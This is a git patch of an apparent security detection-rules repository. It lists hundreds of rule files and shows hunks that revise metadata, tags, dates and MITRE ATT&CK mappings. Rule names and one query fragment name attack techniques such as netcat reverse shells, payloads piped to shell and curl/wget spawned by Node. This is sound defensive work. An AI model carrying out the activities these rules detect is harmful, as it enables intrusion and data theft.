...vasion_defender_disabled_via_registry.toml | 12 +- ...ion_defender_exclusion_via_powershell.toml | 29 +- ...efense_evasion_disabling_windows_logs.toml | 20 +- ...vasion_dotnet_compiler_parent_process.toml | 40 ++- ...ecution_control_panel_suspicious_args.toml | 23 +- ...ense_evasion_execution_lolbas_wuauclt.toml | 21 +- ...ecution_msbuild_started_by_office_app.toml | 30 +- ...n_execution_msbuild_started_by_script.toml | 45 ++- ...ion_msbuild_started_by_system_process.toml | 30 +- ...ion_execution_msbuild_started_renamed.toml | 23 +- ...cution_msbuild_started_unusal_process.toml | 21 +- ...execution_suspicious_explorer_winword.toml | 25 +- ...sion_execution_windefend_unusual_path.toml | 36 ++- ..._evasion_file_creation_mult_extension.toml | 24 +- ...sion_hide_encoded_executable_registry.toml | 15 +- ...ense_evasion_iis_httplogging_disabled.toml | 10 +- ...defense_evasion_indirect_exec_conhost.toml | 11 +- .../defense_evasion_injection_msbuild.toml | 18 +- ...efense_evasion_lolbas_win_cdb_utility.toml | 11 +- ...e_evasion_lsass_ppl_disabled_registry.toml | 9 +- ...querading_as_elastic_endpoint_process.toml | 19 +- ..._masquerading_business_apps_installer.toml | 37 ++- ...asion_masquerading_communication_apps.toml | 19 +- ...erading_suspicious_werfault_childproc.toml | 37 ++- ..._evasion_microsoft_defender_tampering.toml | 8 +- ...nse_evasion_modify_ownership_os_files.toml | 25 +- ...e_evasion_ms_office_suspicious_regmod.toml | 30 +- ...efense_evasion_msiexec_remote_payload.toml | 35 +-- ...etwork_connection_from_windows_binary.toml | 51 +--- ...persistence_account_tokenfilterpolicy.toml | 46 ++- .../defense_evasion_posh_assembly_load.toml | 23 +- .../defense_evasion_posh_compressed.toml | 19 +- ...fense_evasion_posh_defender_tampering.toml | 24 +- .../defense_evasion_posh_encryption.toml | 28 +- .../defense_evasion_posh_high_entropy.toml | 28 +- .../defense_evasion_posh_obfuscation.toml | 27 +- ...nse_evasion_posh_obfuscation_backtick.toml | 27 +- ...evasion_posh_obfuscation_backtick_var.toml | 27 +- ..._evasion_posh_obfuscation_char_arrays.toml | 27 +- ...asion_posh_obfuscation_concat_dynamic.toml | 27 +- ...sh_obfuscation_high_number_proportion.toml | 27 +- ...fuscation_iex_env_vars_reconstruction.toml | 27 +- ...obfuscation_iex_string_reconstruction.toml | 27 +- ...asion_posh_obfuscation_index_reversal.toml | 24 +- ...sion_posh_obfuscation_reverse_keyword.toml | 27 +- ...vasion_posh_obfuscation_string_concat.toml | 27 +- ...vasion_posh_obfuscation_string_format.toml | 27 +- ...scation_whitespace_special_proportion.toml | 30 +- ...efense_evasion_posh_process_injection.toml | 25 +- ..._powershell_windows_firewall_disabled.toml | 40 ++- ...eg_disable_enableglobalqueryblocklist.toml | 24 +- ...efense_evasion_regmod_remotemonologue.toml | 52 ++-- ...efense_evasion_right_to_left_override.toml | 24 +- rules/windows/defense_evasion_sc_sdset.toml | 24 +- ...ion_scheduledjobs_at_protocol_enabled.toml | 46 ++- ..._evasion_sdelete_like_filename_rename.toml | 34 ++- ...ackdoor_service_disabled_via_registry.toml | 39 ++- ..._evasion_suspicious_certutil_commands.toml | 46 ++- ...picious_execution_from_mounted_device.toml | 27 +- ...n_suspicious_managedcode_host_process.toml | 59 ++-- ...picious_process_access_direct_syscall.toml | 25 +- ...efense_evasion_suspicious_scrobj_load.toml | 10 +- ...defense_evasion_suspicious_wmi_script.toml | 28 +- ...evasion_suspicious_zoom_child_process.toml | 48 ++- ..._critical_proc_abnormal_file_activity.toml | 41 ++- ...sion_unsigned_dll_loaded_from_suspdir.toml | 15 +- ...fense_evasion_untrusted_driver_loaded.toml | 19 +- ...nusual_network_connection_via_dllhost.toml | 29 +- ...usual_network_connection_via_rundll32.toml | 37 ++- ...on_unusual_process_network_connection.toml | 23 +- ...vasion_wdac_policy_by_unusual_process.toml | 8 +- .../defense_evasion_wsl_bash_exec.toml | 31 +- .../defense_evasion_wsl_enabled_via_dism.toml | 15 +- .../defense_evasion_wsl_kalilinux.toml | 45 ++- ...nse_evasion_wsl_registry_modification.toml | 10 +- ...discovery_active_directory_webservice.toml | 8 +- .../discovery_ad_explorer_execution.toml | 17 +- .../discovery_adfind_command_activity.toml | 12 +- .../discovery_command_system_account.toml | 36 ++- ...enumerating_domain_trusts_via_dsquery.toml | 8 +- .../discovery_high_number_ad_properties.toml | 18 +- ...scovery_host_public_ip_address_lookup.toml | 39 ++- .../discovery_posh_invoke_sharefinder.toml | 50 ++- ...scovery_posh_suspicious_api_functions.toml | 65 ++-- .../discovery_whoami_command_activity.toml | 8 +- ...arwinds_backdoor_child_cmd_powershell.toml | 40 ++- ...inds_backdoor_unusual_child_processes.toml | 30 +- .../windows/execution_com_object_xwizard.toml | 35 +-- ...and_prompt_connecting_to_the_internet.toml | 45 ++- ...tion_command_shell_started_by_svchost.toml | 18 +- ...mand_shell_started_by_unusual_process.toml | 8 +- .../execution_command_shell_via_rundll32.toml | 69 +++-- ...tion_delayed_via_ping_lolbas_unsigned.toml | 62 ++-- .../execution_downloaded_shortcut_files.toml | 36 ++- .../execution_downloaded_url_file.toml | 34 ++- .../execution_enumeration_via_wmiprvse.toml | 61 ++-- .../execution_from_unusual_path_cmdline.toml | 64 ++-- ...le_program_connecting_to_the_internet.toml | 49 +-- ...cution_initial_access_foxmail_exploit.toml | 17 +- ...execution_initial_access_via_msc_file.toml | 61 ++-- ...cution_initial_access_wps_dll_exploit.toml | 33 +- rules/windows/execution_mofcomp.toml | 23 +- .../execution_ms_office_written_file.toml | 38 ++- .../execution_posh_hacktool_functions.toml | 104 +------ .../execution_posh_portable_executable.toml | 32 +- ...on_powershell_susp_args_via_winscript.toml | 12 +- ...ution_psexec_lateral_movement_command.toml | 17 +- ...er_program_connecting_to_the_internet.toml | 23 +- .../execution_revshell_cmd_via_netcat.toml | 28 +- ...tion_scheduled_task_powershell_source.toml | 43 +-- .../execution_scripting_remote_webdav.toml | 57 ++-- .../execution_scripts_archive_file.toml | 21 +- ...xecution_shared_modules_local_sxs_dll.toml | 34 ++- .../windows/execution_suspicious_cmd_wmi.toml | 38 ++- .../execution_suspicious_pdf_reader.toml | 46 ++- .../execution_suspicious_psexesvc.toml | 38 +-- .../execution_via_compiled_html_file.toml | 37 ++- .../execution_via_hidden_shell_conhost.toml | 48 ++- ...ion_via_mmc_console_file_unusual_path.toml | 42 ++- ...execution_windows_cmd_shell_susp_args.toml | 39 ++- .../execution_windows_fakecaptcha_cmd_ps.toml | 76 +++-- .../execution_windows_phish_clickfix.toml | 77 ++++- ...xecution_windows_powershell_susp_args.toml | 35 +-- ...xecution_windows_script_from_internet.toml | 74 ++--- .../exfiltration_rclone_cloud_upload.toml | 8 +- .../exfiltration_smb_rare_destination.toml | 30 +- .../windows/impact_backup_file_deletion.toml | 8 +- ...deleting_backup_catalogs_with_wbadmin.toml | 8 +- ...pact_high_freq_file_renames_by_kernel.toml | 24 +- .../windows/impact_mod_critical_os_files.toml | 30 +- .../impact_ransomware_file_rename_smb.toml | 28 +- .../impact_ransomware_note_file_over_smb.toml | 28 +- ...e_shadow_copy_deletion_via_powershell.toml | 28 +- ..._volume_shadow_copy_deletion_via_wmic.toml | 26 +- ..._evasion_suspicious_htm_file_creation.toml | 36 ++- ...itial_access_execution_from_inetcache.toml | 56 ++-- ...access_execution_from_removable_media.toml | 25 +- ...l_access_execution_remote_via_msiexec.toml | 32 +- ...al_access_execution_via_office_addins.toml | 44 ++- ...cess_exfiltration_first_time_seen_usb.toml | 32 +- ...ial_access_exploit_jetbrains_teamcity.toml | 68 ++--- ..._access_potential_webhelpdesk_exploit.toml | 56 +--- ...itial_access_rdp_file_mail_attachment.toml | 41 ++- ...al_access_script_executing_powershell.toml | 41 ++- ...ccess_scripts_process_started_via_wmi.toml | 37 ++- ...cious_execution_from_vscode_extension.toml | 59 ++-- ...l_access_suspicious_ms_exchange_files.toml | 38 ++- ...access_suspicious_ms_exchange_process.toml | 34 ++- ...ious_ms_exchange_worker_child_process.toml | 60 ++-- ...ss_suspicious_ms_office_child_process.toml | 72 +++-- ...s_suspicious_ms_outlook_child_process.toml | 72 +++-- ..._suspicious_windows_server_update_svc.toml | 39 ++- .../initial_access_url_cve_2025_33053.toml | 56 ++-- ...explorer_suspicious_child_parent_args.toml | 80 +++-- ..._access_webshell_screenconnect_server.toml | 28 +- ...l_access_xsl_script_execution_via_com.toml | 46 +-- .../lateral_movement_alternate_creds_pth.toml | 30 +- .../windows/lateral_movement_cmd_service.toml | 55 ++-- ...redential_access_kerberos_correlation.toml | 39 ++- rules/windows/lateral_movement_dcom_hta.toml | 24 +- .../windows/lateral_movement_dcom_mmc20.toml | 38 +-- ...t_dcom_shellwindow_shellbrowserwindow.toml | 35 +-- ...n_lanman_nullsessionpipe_modification.toml | 31 +- ...movement_executable_tool_transfer_smb.toml | 13 +- ...nt_execution_via_file_shares_sequence.toml | 10 +- .../lateral_movement_incoming_wmi.toml | 41 +-- ...ment_mount_hidden_or_webdav_share_net.toml | 62 +++- ...l_movement_powershell_remoting_target.toml | 36 ++- ...lateral_movement_rdp_enabled_registry.toml | 32 +- ...ovement_remote_file_copy_hidden_share.toml | 16 +- ...ement_remote_service_installed_winlog.toml | 13 +- .../lateral_movement_remote_services.toml | 33 +- ..._movement_remote_task_creation_winlog.toml | 43 +-- ...ateral_movement_scheduled_task_target.toml | 39 ++- ...movement_unusual_dns_service_children.toml | 34 ++- ...ement_unusual_dns_service_file_writes.toml | 30 +- ...l_movement_via_startup_folder_rdp_smb.toml | 31 +- .../lateral_movement_via_wsus_update.toml | 37 +-- .../windows/persistence_ad_adminsdholder.toml | 35 ++- .../persistence_adobe_hijack_persistence.toml | 15 +- .../windows/persistence_app_compat_shim.toml | 37 +-- .../persistence_appcertdlls_registry.toml | 39 ++- .../persistence_appinitdlls_registry.toml | 34 ++- ...persistence_browser_extension_install.toml | 8 +- ...evasion_hidden_local_account_creation.toml | 39 ++- ...tence_evasion_registry_ifeo_injection.toml | 40 ++- ...egistry_startup_shell_folder_modified.toml | 32 +- ...sistence_group_modification_by_system.toml | 25 +- ...istence_local_scheduled_task_creation.toml | 33 +- ...stence_local_scheduled_task_scripting.toml | 41 ++- ...istence_msds_alloweddelegateto_krbtgt.toml | 31 +- ...ersistence_msi_installer_task_startup.toml | 47 ++- ...persistence_msoffice_startup_registry.toml | 34 ++- .../windows/persistence_netsh_helper_dll.toml | 19 +- ...ll_exch_mailbox_activesync_add_device.toml | 43 ++- .../persistence_powershell_profiles.toml | 39 ++- ...escalation_via_accessibility_features.toml | 24 +- .../persistence_registry_uncommon.toml | 40 +-- .../persistence_remote_password_reset.toml | 30 +- ...ce_runtime_run_key_startup_susp_procs.toml | 10 +- ...istence_sdprop_exclusion_dsheuristics.toml | 51 ++-- .../persistence_service_dll_unsigned.toml | 56 +++- ...stence_service_windows_service_winlog.toml | 33 +- .../persistence_services_registry.toml | 32 +- ...lder_file_written_by_unsigned_process.toml | 34 ++- .../persistence_startup_folder_scripts.toml | 12 +- ...stence_suspicious_com_hijack_registry.toml | 35 ++- ...s_image_load_scheduled_task_ms_office.toml | 36 ++- ...nce_suspicious_scheduled_task_runtime.toml | 24 +- ...e_suspicious_service_created_registry.toml | 40 ++- ...uspicious_user_mandatory_profile_file.toml | 18 +- ...istence_sysmon_wmi_event_subscription.toml | 33 +- ...ersistence_system_shells_via_services.toml | 60 ++-- .../persistence_temp_scheduled_task.toml | 32 +- .../persistence_time_provider_mod.toml | 39 ++- ..._account_added_to_privileged_group_ad.toml | 35 +-- .../persistence_user_account_creation.toml | 13 +- .../persistence_via_application_shimming.toml | 27 +- ...rsistence_via_bits_job_notify_command.toml | 29 +- ...sistence_via_hidden_run_key_valuename.toml | 60 ++-- ...sa_security_support_provider_registry.toml | 34 ++- ...emetrycontroller_scheduledtask_hijack.toml | 22 +- ...ia_update_orchestrator_service_hijack.toml | 30 +- ...nt_instrumentation_event_subscription.toml | 35 ++- ...tence_via_wmi_stdregprov_run_services.toml | 49 +-- ...ia_xp_cmdshell_mssql_stored_procedure.toml | 53 ++-- .../persistence_webshell_detection.toml | 66 ++-- .../persistence_werfault_reflectdebugger.toml | 20 +- ...on_account_takeover_mixed_logon_types.toml | 19 +- ...ge_escalation_badsuccessor_dmsa_abuse.toml | 33 +- ...tion_create_process_as_different_user.toml | 33 +- ...tion_create_process_with_token_unpriv.toml | 33 +- ...privilege_escalation_credroaming_ldap.toml | 33 +- ...ilege_escalation_disable_uac_registry.toml | 56 ++-- ...alation_dmsa_creation_by_unusual_user.toml | 39 ++- ...e_escalation_dns_serverlevelplugindll.toml | 27 +- ...ege_escalation_driver_newterm_imphash.toml | 32 +- ...lege_escalation_expired_driver_loaded.toml | 33 +- ...lege_escalation_exploit_cve_202238028.toml | 32 +- ...calation_gpo_schtask_service_creation.toml | 44 ++- ...ege_escalation_group_policy_iniscript.toml | 41 ++- ...scalation_group_policy_scheduled_task.toml | 39 ++- ...rivilege_escalation_installertakeover.toml | 14 +- ...scalation_krbrelayup_service_creation.toml | 44 +-- ...privilege_escalation_lsa_auth_package.toml | 35 ++- ...privilege_escalation_make_token_local.toml | 35 +-- ...escalation_msi_repair_via_mshelp_link.toml | 22 +- ...e_escalation_named_pipe_impersonation.toml | 8 +- ...scalation_newcreds_logon_rare_process.toml | 36 +-- ...ge_escalation_persistence_phantom_dll.toml | 51 +++- ...on_port_monitor_print_processor_abuse.toml | 34 ++- ...e_escalation_posh_token_impersonation.toml | 56 ++-- ...printspooler_suspicious_file_deletion.toml | 34 ++- ..._escalation_reg_service_imagepath_mod.toml | 59 ++-- ...calation_rogue_windir_environment_var.toml | 10 +- ...lation_samaccountname_spoofing_attack.toml | 44 ++- ...on_service_control_spawned_script_int.toml | 100 +++--- ...alation_suspicious_dnshostname_update.toml | 19 +- ...ege_escalation_takeover_new_source_ip.toml | 31 +- ...escalation_thread_cpu_priority_hijack.toml | 15 +- ...lation_tokenmanip_sedebugpriv_enabled.toml | 25 +- ...lege_escalation_uac_bypass_com_clipup.toml | 43 ++- ...ge_escalation_uac_bypass_com_ieinstal.toml | 56 +++- ...n_uac_bypass_com_interface_icmluautil.toml | 55 +++- ...alation_uac_bypass_diskcleanup_hijack.toml | 58 +++- ...escalation_uac_bypass_dll_sideloading.toml | 40 +-- ...ge_escalation_uac_bypass_event_viewer.toml | 24 +- ...ege_escalation_uac_bypass_mock_windir.toml | 40 +-- ...scalation_uac_bypass_winfw_mmc_hijack.toml | 40 +-- ...tion_unusual_parentchild_relationship.toml | 40 ++- ...n_unusual_svchost_childproc_childless.toml | 30 +- ...rivilege_escalation_via_ppid_spoofing.toml | 10 +- ...ilege_escalation_via_rogue_named_pipe.toml | 8 +- .../privilege_escalation_via_token_theft.toml | 30 +- ...on_windows_service_via_unusual_client.toml | 30 +- ...collection_archive_data_zip_imageload.toml | 8 +- ...ction_common_compressed_archived_file.toml | 47 ++- ...llection_microsoft_purview_dlp_signal.toml | 23 +- ...microsoft_purview_insider_risk_signal.toml | 23 +- .../collection_posh_compression.toml | 30 +- ...ommand_and_control_bitsadmin_activity.toml | 30 +- ...llama_model_download_untrusted_source.toml | 43 ++- ...access_entra_id_risk_detection_signal.toml | 30 +- ...ntial_access_iis_apppoolsa_pwd_appcmd.toml | 14 +- ...al_access_mdmp_file_unusual_extension.toml | 32 +- .../defense_evasion_dll_hijack.toml | 10 +- ...evasion_dotnet_clickonce_dfsvc_netcon.toml | 16 +- ...fense_evasion_download_susp_extension.toml | 47 ++- ...cution_via_visualstudio_prebuildevent.toml | 18 +- .../defense_evasion_generic_deletion.toml | 10 +- ...fense_evasion_injection_from_msoffice.toml | 59 +++- ...defense_evasion_masquerading_browsers.toml | 29 +- .../defense_evasion_masquerading_vlc_dll.toml | 29 +- ...ense_evasion_masquerading_windows_dll.toml | 34 ++- ...ion_masquerading_windows_system32_exe.toml | 29 +- ...soft_security_compliance_admin_signal.toml | 43 +-- ...fense_evasion_msdt_suspicious_diagcab.toml | 32 +- ...ense_evasion_outlook_suspicious_child.toml | 52 +++- ..._obfuscation_proportion_special_chars.toml | 30 +- ..._evasion_powershell_clear_logs_script.toml | 24 +- ...nse_evasion_service_disabled_registry.toml | 25 +- ...defense_evasion_service_path_registry.toml | 33 +- .../defense_evasion_services_exe_path.toml | 34 ++- .../defense_evasion_unsigned_bits_client.toml | 13 +- .../defense_evasion_write_dac_access.toml | 42 +-- .../discovery_capnetraw_capability.toml | 25 +- .../discovery_generic_account_groups.toml | 14 +- ...ry_kernel_module_enumeration_via_proc.toml | 9 +- ...ubectl_workload_and_cluster_discovery.toml | 12 +- .../discovery_linux_modprobe_enumeration.toml | 44 +-- .../discovery_linux_sysctl_enumeration.toml | 30 +- ...ery_linux_system_owner_user_discovery.toml | 8 +- .../discovery_net_share_discovery_winlog.toml | 27 +- rules_building_block/discovery_net_view.toml | 29 +- .../discovery_of_domain_groups.toml | 8 +- .../discovery_posh_generic.toml | 57 ++-- .../discovery_posh_password_policy.toml | 33 +- ..._post_exploitation_external_ip_lookup.toml | 12 +- ...ery_potential_memory_seeking_activity.toml | 14 +- ...y_process_discovery_via_builtin_tools.toml | 13 +- ...ote_system_discovery_commands_windows.toml | 13 +- .../discovery_security_software_wmic.toml | 19 +- ...discovery_suspicious_proc_enumeration.toml | 10 +- .../discovery_system_network_connections.toml | 8 +- .../discovery_system_service_discovery.toml | 8 +- .../discovery_win_network_connections.toml | 19 +- ...d_identity_protection_risk_detections.toml | 48 +-- ...execution_aws_lambda_function_updated.toml | 31 +- ...ution_github_new_event_action_for_pat.toml | 29 +- ...n_github_new_repo_interaction_for_pat.toml | 29 +- ..._github_new_repo_interaction_for_user.toml | 29 +- .../execution_github_repo_created.toml | 29 +- ...n_github_repo_interaction_from_new_ip.toml | 29 +- .../execution_linux_segfault.toml | 10 +- .../execution_mcp_server_child_process.toml | 16 +- ...ution_settingcontent_ms_file_creation.toml | 48 +-- ...execution_unsigned_service_executable.toml | 34 ++- .../impact_github_pat_access_revoked.toml | 15 +- ...ss_anomalous_rsc_flight_data_patterns.toml | 28 +- ..._access_github_new_ip_address_for_pat.toml | 34 +-- ...ss_microsoft_air_investigation_signal.toml | 26 +- ...cess_microsoft_defender_alerts_signal.toml | 23 +- ...t_defender_threat_intelligence_signal.toml | 32 +- ...ft_purview_security_compliance_signal.toml | 38 ++- ...cess_new_okta_authentication_behavior.toml | 13 +- ...cess_okta_admin_console_login_failure.toml | 26 +- rules_building_block/lateral_movement_at.toml | 44 ++- .../lateral_movement_posh_winrm_activity.toml | 38 +-- ...movement_unusual_process_sql_accounts.toml | 32 +- .../lateral_movement_wmic_remote.toml | 48 +-- ...e_aws_iam_login_profile_added_to_user.toml | 21 +- .../persistence_github_new_pat_for_user.toml | 34 ++- ...github_new_user_added_to_organization.toml | 13 +- ...e_iam_instance_request_to_iam_service.toml | 31 +- .../persistence_startup_folder_lnk.toml | 12 +- .../persistence_transport_agent_exchange.toml | 24 +- ...ce_web_server_potential_sql_injection.toml | 66 +++- ...sistence_web_server_sus_file_creation.toml | 44 ++- ..._escalation_sts_getsessiontoken_abuse.toml | 35 ++- 1271 files changed, 26216 insertions(+), 13548 deletions(-) create mode 100644 rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml create mode 100644 rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml create mode 100644 rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml create mode 100644 rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml create mode 100644 rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml create mode 100644 rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml create mode 100644 rules/cross-platform/execution_register_github_actions_runner.toml create mode 100644 rules/cross-platform/execution_revershell_via_shell_cmd.toml create mode 100644 rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml create mode 100644 rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml create mode 100644 rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml create mode 100644 rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml create mode 100644 rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml create mode 100644 rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml create mode 100644 rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml create mode 100644 rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml create mode 100644 rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml create mode 100644 rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml create mode 100644 rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml create mode 100644 rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml create mode 100644 rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml diff --git a/rules/apm/apm_403_response_to_a_post.toml b/rules/apm/apm_403_response_to_a_post.toml index 05b6e24dba3..ef503e3741b 100644 --- a/rules/apm/apm_403_response_to_a_post.toml +++ b/rules/apm/apm_403_response_to_a_post.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["apm"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ references = ["https://en.wikipedia.org/wiki/HTTP_403"] risk_score = 47 rule_id = "a87a4e42-1d82-44bd-b0bf-d9b7f91fb89e" severity = "medium" -tags = ["Tactic: Initial Access", "Data Source: APM", "Resources: Investigation Guide"] +tags = ["Data Source: APM", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -67,15 +67,3 @@ Web applications often use POST requests to handle data submissions securely. Ho - Review and update the web application firewall (WAF) rules to better detect and block unauthorized POST requests, ensuring that legitimate traffic is not affected. - If applicable, engage with the development team to conduct a security review of the application code to identify and fix any potential vulnerabilities that could be exploited by attackers.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/apm/apm_405_response_method_not_allowed.toml b/rules/apm/apm_405_response_method_not_allowed.toml index b46b5811271..1116968ca65 100644 --- a/rules/apm/apm_405_response_method_not_allowed.toml +++ b/rules/apm/apm_405_response_method_not_allowed.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["apm"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ references = ["https://en.wikipedia.org/wiki/HTTP_405"] risk_score = 47 rule_id = "75ee75d8-c180-481c-ba88-ee50129a6aef" severity = "medium" -tags = ["Tactic: Reconnaissance", "Data Source: APM", "Resources: Investigation Guide"] +tags = ["Data Source: APM", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -67,15 +67,3 @@ Web applications often restrict HTTP methods to protect resources, allowing only - Conduct a vulnerability assessment of the web application to identify and remediate any potential security weaknesses that could be exploited by unauthorized HTTP methods. - Document the incident, including the response actions taken, and update the incident response plan to improve future detection and response capabilities for similar threats.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/apm/apm_sqlmap_user_agent.toml b/rules/apm/apm_sqlmap_user_agent.toml index 264a4d2fa50..82c01caadac 100644 --- a/rules/apm/apm_sqlmap_user_agent.toml +++ b/rules/apm/apm_sqlmap_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["apm"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ references = ["http://sqlmap.org/"] risk_score = 47 rule_id = "d49cc73f-7a16-4def-89ce-9fc7127d7820" severity = "medium" -tags = ["Tactic: Reconnaissance", "Data Source: APM", "Resources: Investigation Guide"] +tags = ["Data Source: APM", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -68,20 +68,3 @@ Sqlmap is a widely-used open-source tool designed to automate the detection and - Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation. - Document the incident details and response actions taken for future reference and to enhance incident response procedures.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.002" -name = "Vulnerability Scanning" -reference = "https://attack.mitre.org/techniques/T1595/002/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/cross-platform/command_and_control_common_llm_endpoint.toml b/rules/cross-platform/command_and_control_common_llm_endpoint.toml index 61c7d4276cc..8614a7cea40 100644 --- a/rules/cross-platform/command_and_control_common_llm_endpoint.toml +++ b/rules/cross-platform/command_and_control_common_llm_endpoint.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/10" [rule] @@ -55,7 +55,18 @@ references = ["https://malpedia.caad.fkie.fraunhofer.de/details/py.lamehug"] risk_score = 47 rule_id = "4ae94fc1-f08f-419f-b692-053d28219380" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: AI Model Access", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -139,21 +150,16 @@ network where host.os.type in ("macos", "windows") and dns.question.name != null [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATLAS" -[rule.threat.tactic] -id = "AML.TA0000" -name = "AI Model Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0000/" diff --git a/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml b/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml index 6ae2b55dc7b..5ba4932123d 100644 --- a/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml +++ b/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -123,12 +123,17 @@ process.parent.name in ("node", "bun", "node.exe", "bun.exe") and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] + name = "Application Layer Protocol" + id = "T1071" + reference = "https://attack.mitre.org/techniques/T1071/" + + [[rule.threat.technique.subtechnique]] + name = "Web Protocols" + id = "T1071.001" + reference = "https://attack.mitre.org/techniques/T1071/001/" diff --git a/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml b/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml index 6e96067d174..714d192afa5 100644 --- a/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml +++ b/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/04" [rule] author = ["Elastic"] @@ -116,13 +116,19 @@ network where host.os.type in ("macos", "windows") and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml b/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml index ffaa3660825..47c2fb74836 100644 --- a/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml +++ b/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/10" 